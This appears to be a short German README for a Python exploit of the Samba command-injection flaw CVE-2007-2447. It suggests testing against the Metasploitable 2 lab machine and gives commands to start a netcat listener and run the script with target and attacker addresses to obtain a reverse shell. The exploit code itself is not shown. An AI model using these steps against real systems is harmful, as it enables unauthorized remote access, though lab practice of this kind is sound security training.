
Python-Exploit für CVE-2007-2447, der die Command-Injection im Samba-Benutzernamen-Map-Skript auslöst, um auf anfälligen Zielen eine Reverse Shell zu öffnen.
Um das Skript zu testen, empfehle ich Ihnen die virtuelle Maschine „metasploitable 2“, die hier verfügbar ist. Das Skript zeigt eine Reverse-Shell an, wenn der Exploit funktioniert. Um die Verbindung herzustellen, öffnen Sie einfach eine Netcat-Sitzung wie:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
und auf meinem netcat :
netcat -lnvp 1337
Ergebnis:
netcat :
alt text
und auf dem Skript:
alt text
Ich habe ein Payload aus einem Cheat-Sheet verwendet. Der Link ist hier verfügbar. Sie können es durch andere Payloads ersetzen.